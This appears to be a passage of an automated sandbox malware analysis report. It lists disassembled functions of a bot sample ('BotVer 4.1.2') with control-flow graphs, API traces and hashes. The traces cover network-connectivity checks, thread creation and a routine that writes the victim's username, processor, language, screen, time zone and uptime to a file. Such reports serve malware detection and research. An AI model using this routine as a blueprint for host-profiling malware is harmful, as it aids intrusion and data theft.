                                                                                                                                                                                                              control_flow_graph 434 1305a50-1305a8e GetSystemWindowsDirectoryA 435 1305a90-1305a95 434->435 435->435 436 1305a97-1305ad6 GetVolumeInformationA 435->436 437 1305ad8-1305ada 436->437 438 1305add-1305ae2 436->438 437->438 439 1305ae5-1305aea 438->439 439->439 440 1305aec-1305af6 439->440 441 1305afb-1305b14 440->441 442 1305b16 441->442 443 1305b1b-1305b2f _snprintf 441->443 442->443 444 1305b30-1305b36 443->444 444->444 445 1305b38-1305b4f 444->445 446 1305b51-1305b53 445->446 447 1305af8 445->447 448 1305b58-1305b77 446->448 447->441 449 1305b79 448->449 450 1305b7e-1305b9c _snprintf 448->450 449->450 450->448 451 1305b9e-1305ba4 450->451
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 01305A7F
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 01305AB8
                                                                                                                                                                                                              • _snprintf.MSVCRT(9E2B3F07a,00000104,01325748,?,?), ref: 01305B23
                                                                                                                                                                                                              • _snprintf.MSVCRT(61C5C0AD,00000104,01325748,00FFAAFF,?), ref: 01305B86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _snprintf$DirectoryInformationSystemVolumeWindows
                                                                                                                                                                                                              • String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$61C5C0AD$9E2B3F07a
                                                                                                                                                                                                              • API String ID: 2823094833-1044879240
                                                                                                                                                                                                              • Opcode ID: 8e9a3768418bb3d0a5d93609e74c70d55cf38cfdb5ccf377258267b12d6643a5
                                                                                                                                                                                                              • Instruction ID: 5e1ed74bcae42048511e41f3bcfc389311d4d4875b6dc31b2faef269c9724331
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9a3768418bb3d0a5d93609e74c70d55cf38cfdb5ccf377258267b12d6643a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35415971A00219AFD711DF6C8994BEDF7FAEF84304F5400A4E648EB2C1D6B06B49CB40
                                                                                                                                                                                                              Function 012E6DE0 Relevance: 7.6, APIs: 5, Instructions: 81sleepthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 452 12e6de0-12e6e08 memset call 12f4f80 454 12e6e0d-12e6e0f 452->454 455 12e6e27-12e6e2e 454->455 456 12e6e11 454->456 458 12e6e3e-12e6e4f 455->458 459 12e6e30-12e6e38 call 12e6690 455->459 457 12e6e17-12e6e25 Sleep call 12f4f80 456->457 457->455 461 12e6e50-12e6e58 458->461 459->458 467 12e6eda-12e6edf 459->467 464 12e6e5a 461->464 465 12e6e93-12e6ea8 WaitForMultipleObjects 461->465 468 12e6e60-12e6e63 464->468 469 12e6eb0-12e6ec2 CloseHandle 465->469 468->465 470 12e6e65-12e6e7c call 12e63f0 CreateThread 468->470 469->469 471 12e6ec4-12e6ecb 469->471 476 12e6e7e-12e6e85 470->476 477 12e6e87-12e6e88 470->477 473 12e6ecd-12e6ed3 471->473 474 12e6ed9 471->474 473->461 473->474 474->467 478 12e6e89-12e6e91 476->478 477->478 478->465 478->468
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,0000040C,00000000,00000000), ref: 012E6E00
                                                                                                                                                                                                                • Part of subcall function 012F4F80: IsNetworkAlive.SENSAPI(012E6E0D,00000000), ref: 012F4F93
                                                                                                                                                                                                                • Part of subcall function 012F4F80: #680.SHELL32 ref: 012F4FA1
                                                                                                                                                                                                                • Part of subcall function 012F4F80: DnsFlushResolverCache.DNSAPI ref: 012F4FAB
                                                                                                                                                                                                                • Part of subcall function 012F4F80: memset.MSVCRT(?,00000000,00000103,00000000,774D0F10), ref: 012F4FC8
                                                                                                                                                                                                                • Part of subcall function 012F4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,774D0F10), ref: 012F4FE7
                                                                                                                                                                                                                • Part of subcall function 012F4F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 012F5000
                                                                                                                                                                                                                • Part of subcall function 012F4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 012F5013
                                                                                                                                                                                                                • Part of subcall function 012F4F80: memset.MSVCRT(?,00000000,00000103,?,00000000,774D0F10), ref: 012F502C
                                                                                                                                                                                                                • Part of subcall function 012F4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,774D0F10), ref: 012F5045
                                                                                                                                                                                                                • Part of subcall function 012F4F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 012F5058
                                                                                                                                                                                                                • Part of subcall function 012F4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 012F5065
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 012E6E1C
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012E6A90,00000000,00000000,00000000,774D0F10,?,00000000,00000000), ref: 012E6E78
                                                                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,774D0F10,?,00000000,00000000), ref: 012E6EA0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 012E6EB8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$CheckConnectionInternetlstrcpyn$#680AliveCacheCloseCreateFlushHandleMultipleNetworkObjectsResolverSleepThreadWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1772768556-0
                                                                                                                                                                                                              • Opcode ID: a052f59c26c7b9bba989091fe167701a54e83f4ee138d7f3243982a9c7301ae2
                                                                                                                                                                                                              • Instruction ID: 7e01c6e2d6ad35fd113c74f5a71a0eae80dc41ab852a2f10f193579ed6429249
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a052f59c26c7b9bba989091fe167701a54e83f4ee138d7f3243982a9c7301ae2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B32181B1A603166BEB30AB58DC89FBE36DCA774714F880278EB09A60C0D7B0598187D5
                                                                                                                                                                                                              Function 01304980 Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 479 1304980-13049b7 OpenProcess 480 13049f9-1304a01 479->480 481 13049b9-13049d2 GetProcessTimes 479->481 482 13049d4-13049d7 481->482 483 13049da-13049ea GetHandleInformation 481->483 482->483 483->480 484 13049ec-13049f0 483->484 484->480 485 13049f2-13049f3 CloseHandle 484->485 485->480
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,7763FFB0,?,?,?,?,?,012F7967,00000000,?,00000000), ref: 013049AD
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,012F7967,?,?,?,?,?,012F7967,00000000,?,00000000), ref: 013049CA
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,012F7967,00000000,?,00000000), ref: 013049E2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,012F7967,00000000), ref: 013049F3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess$CloseInformationOpenTimes
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3228293703-0
                                                                                                                                                                                                              • Opcode ID: 4efa2f671a57dcb1ced5849cbdf7c0fc39aff5d670758c0efe371fd79d09588f
                                                                                                                                                                                                              • Instruction ID: e20a2241feae82e5aa2b865e5c20ba4eb074b4ca268b9da71dc1b03c3c1aebf5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4efa2f671a57dcb1ced5849cbdf7c0fc39aff5d670758c0efe371fd79d09588f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA11EFB1D00219ABDB119F9AC8849EFFBFCEF98644F10815AEA05A7141D77096458BA0
                                                                                                                                                                                                              Function 012F77C0 Relevance: 6.0, APIs: 4, Instructions: 27threadCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 486 12f77c0-12f77de CreateThread 487 12f7803-12f7805 ExitThread 486->487 488 12f77e0-12f77f4 GetHandleInformation 486->488 488->487 489 12f77f6-12f77fa 488->489 489->487 490 12f77fc-12f77fd CloseHandle 489->490 490->487
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012F6CA0,00000000,00000000,00000000), ref: 012F77D4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F77EC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F77FD
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 012F7805
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleThread$CloseCreateExitInformation
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4233414108-0
                                                                                                                                                                                                              • Opcode ID: 6cc53e8dc69a8acbf4321e9452e1b3753f606f616d411c450c60b3b56027aa29
                                                                                                                                                                                                              • Instruction ID: e69b4fa0e40bb0d6309b1e37efaa687f873799b1696ca6453374032700d3a482
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cc53e8dc69a8acbf4321e9452e1b3753f606f616d411c450c60b3b56027aa29
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9E06D30A55315BBF7316A95CD0EF9EBAACAB01F01F20412CFB00AA0C1D7A0AA00D7A5

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 012E4B00 Relevance: 325.1, APIs: 164, Strings: 21, Instructions: 1343filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,?,0133D3A4,775B5CE0), ref: 012E4C37
                                                                                                                                                                                                                • Part of subcall function 013059D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 013059EE
                                                                                                                                                                                                                • Part of subcall function 013059D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,012E4C50,?,?,012E4C50,?,00000001), ref: 01305A0B
                                                                                                                                                                                                                • Part of subcall function 013059D0: SetNamedSecurityInfoA.ADVAPI32(?,012E4C50,00000010,00000000,00000000,00000000,00000001), ref: 01305A26
                                                                                                                                                                                                                • Part of subcall function 013059D0: LocalFree.KERNEL32(?,?,?,012E4C50,?,00000001), ref: 01305A37
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000001), ref: 012E4C5E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 012E4C6F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{BotVer: ,00000009,012E3F9D,00000000), ref: 012E4C7F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000009,00000000), ref: 012E4C90
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4CA4
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000005,00000000), ref: 012E4CB1
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,4.1.2,00000005,00000000,00000000), ref: 012E4CC1
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000005,00000000), ref: 012E4CD2
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4CE6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E4CF3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E4D03
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000002,00000000), ref: 012E4D14
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 012E4D28
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4D3C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000A,00000000), ref: 012E4D49
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Process: ,0000000A,00000000,00000000), ref: 012E4D59
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,0000000A,00000000), ref: 012E4D6A
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4D9C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E4DAB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E4DBF
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 012E4DD2
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4DE6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E4DF3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E4E03
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E4E14
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 012E4E25
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4E39
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 012E4E46
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Username: ,0000000B,00000000,00000000), ref: 012E4E56
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 012E4E67
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4E92
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E4EA1
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E4EB5
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E4EC8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4EDC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E4EE9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E4EF9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E4F0A
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 012E4F21
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4F35
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 012E4F42
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Processor: ,0000000C,00000000,00000000), ref: 012E4F52
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 012E4F63
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4F8E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E4F9D
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E4FB1
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E4FC4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4FD8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E4FE5
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E4FF5
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E5006
                                                                                                                                                                                                              • GetSystemDefaultLangID.KERNEL32 ref: 012E500C
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000104), ref: 012E5026
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5093
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 012E50A0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Language: ,0000000B,00000000,00000000), ref: 012E50B0
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 012E50C1
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E50EC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E50FB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E510F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E5122
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5136
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E5143
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E5153
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E5164
                                                                                                                                                                                                              • GetDC.USER32(00000000,0000000C), ref: 012E516E
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 012E5175
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000001,00000000), ref: 012E517E
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000000,00000000), ref: 012E5187
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%dx%d@%d,00000000), ref: 012E519F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E51B6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 012E51C3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Screen: ,00000009,00000000,00000000), ref: 012E51D3
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 012E51E4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E520F
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E521E
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E5232
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E5245
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5259
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E5266
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E5276
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E5287
                                                                                                                                                                                                              • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 012E52A7
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E52BB
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 012E52C8
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Date: ,00000007,00000000,00000000), ref: 012E52D8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 012E52E9
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5314
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E5323
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E5337
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E534A
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E535E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E536B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E537B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E538C
                                                                                                                                                                                                              • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 012E53AC
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E53C0
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 012E53CD
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Local time: ,0000000D,00000000,00000000), ref: 012E53DD
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 012E53EE
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E541C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E542B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E543F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E5452
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5466
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E5473
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E5483
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E5494
                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 012E54A1
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%c%d:%02d,?,?,?), ref: 012E5502
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5519
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 012E5526
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{GMT: ,00000006,00000000,00000000), ref: 012E5536
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 012E5547
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5572
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E5581
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E5595
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E55A8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E55BC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E55C9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E55D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E55EA
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E55FE
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 012E560B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Uptime: ,00000009,00000000,00000000), ref: 012E561B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 012E562C
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E566C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012E567B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012E568C
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 012E569F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E56B3
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E56C0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E56D0
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E56E1
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 012E56F3
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5707
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 012E5714
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,00000000,00000000), ref: 012E5724
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 012E5735
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5760
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E576F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E5783
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E5796
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E57AA
